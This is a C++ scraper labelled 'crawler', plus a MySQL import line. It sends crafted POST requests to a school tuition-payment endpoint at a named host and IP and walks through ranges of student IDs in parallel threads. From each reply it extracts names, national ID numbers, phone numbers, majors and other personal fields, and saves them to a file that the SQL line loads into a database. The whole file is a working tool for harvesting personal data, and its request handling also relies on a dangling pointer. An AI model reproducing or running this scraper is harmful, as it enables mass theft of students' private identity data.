crawler
#include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <unistd.h> #include <stdlib.h> #include <netinet/in.h> #include <arpa/inet.h> #include <string.h> #include <cstdint> #include <string> #include <thread> #include <valarray> #include <algorithm> #include <list> #include <regex> std::string Fuck(const char* ip, const uint16_t port, const int studentID) { const auto sock = socket(AF_INET, SOCK_STREAM, 0); struct sockaddr_in server; server.sin_family = AF_INET; server.sin_port = htons(port); server.sin_addr.s_addr = inet_addr(ip); const socklen_t len = sizeof(struct sockaddr_in); connect(sock, (struct sockaddr*)&server, len); const auto sendBuf = (std::string( "POST /web/view/FreshmenPayTuitionFees.aspx/queryStudentByStuNo \ HTTP/1.1\r\nHost: lkdsyxywx.xcht.cc\r\nAccept : application / json, text / javas\ cript, */*; q=0.01\r\nX-Requested-With: XMLHttpRequest\r\nAccept-Language: zh-cn\ \r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/json; charset=UT\ F-8\r\nOrigin: http://lkdsyxywx.xcht.cc\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU \ iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/\ 15E148 MicroMessenger/7.0.5(0x17000523) NetType/WIFI Language/zh_CN\r\nConnectio\ n: close\r\nReferer: http://lkdsyxywx.xcht.cc/web/view/FreshmenPayTuitionFees.as\ px\r\nContent-Length: 38\r\n\r\n{'jsonStr':'{\"studentID\":\"") + std::to_string(studentID) + "\"}'}").c_str(); const auto sendLen = strlen(sendBuf); write(sock, sendBuf, sendLen); char readBuf[1024] = {0}; read(sock, readBuf, 1024); printf("%s", readBuf); close(sock); return std::string(readBuf); } void Write(FILE* fp, std::string str) { fwrite(str.c_str(), sizeof(uint8_t), str.length(), fp); } int main(int argc, char* argv[]) { if (argc != 5) { fprintf(stderr, "%s startStudentID endStudentID(exclude) threadNum savePath\n", argv[0]); exit(EXIT_FAILURE); } std::list<std::string> res(0); const auto startStudentID = strtol(argv[1], &argv[1], 10); const auto endStudentID = strtol(argv[2], &argv[2], 10); const auto threadNum = strtol(argv[3], &argv[3], 10); const auto count = endStudentID - startStudentID; const auto step = count / threadNum; std::valarray<std::thread> threads(threadNum); int id = 1; FILE* fp = fopen(argv[4], "wb"); std::generate(begin(threads), end(threads), [&]() mutable { return std::thread([&]() mutable { const auto start = startStudentID + step * (id - 1); const auto end = threadNum == id ? endStudentID : start + step; const auto _id = id++; printf("thread %d(start=%d, end=%d) start.\n", _id, start, end); for (uint32_t i = start; i < end; i++) { auto s = Fuck("113.246.56.98", 80, i); #define Json(key, json, sm) \ std::regex_search(json, sm, std::regex("\\\\\""#key"\\\\\":(\\\\\".+?\\\\\"|null)")); \ const auto (key) = std::regex_replace((sm)[0].str(), std::regex("(\\\\\""#key"\\\\\":|\\\\\")"), "") printf("%s\n", s.c_str()); std::smatch sm; Json(XH, s, sm); Json(XM, s, sm); Json(XB, s, sm); Json(RXND, s, sm); Json(SFZH, s, sm); Json(BJMC, s, sm); Json(ZYMC, s, sm); Json(BMMC, s, sm); Json(phoneNo, s, sm); printf("%s|%s|%s|%s|%s|%s|%s|%s|%s\n", XH.c_str(), XM.c_str(), XB.c_str(), RXND.c_str(), SFZH.c_str(), BJMC.c_str(), ZYMC.c_str(), BMMC.c_str(), phoneNo.c_str()); fprintf(fp, "%s|%s|%s|%s|%s|%s|%s|%s|%s\n", XH.c_str(), XM.c_str(), XB.c_str(), RXND.c_str(), SFZH.c_str(), BJMC.c_str(), ZYMC.c_str(), BMMC.c_str(), phoneNo.c_str()); } printf("thread %d exit.\n", _id); }); }); for (auto& thread : threads) thread.join(); fclose(fp); }
import to mysql
load data infile '2005-2020.txt' into table swxy.swxy fields terminated by '|' lines terminated by '\n';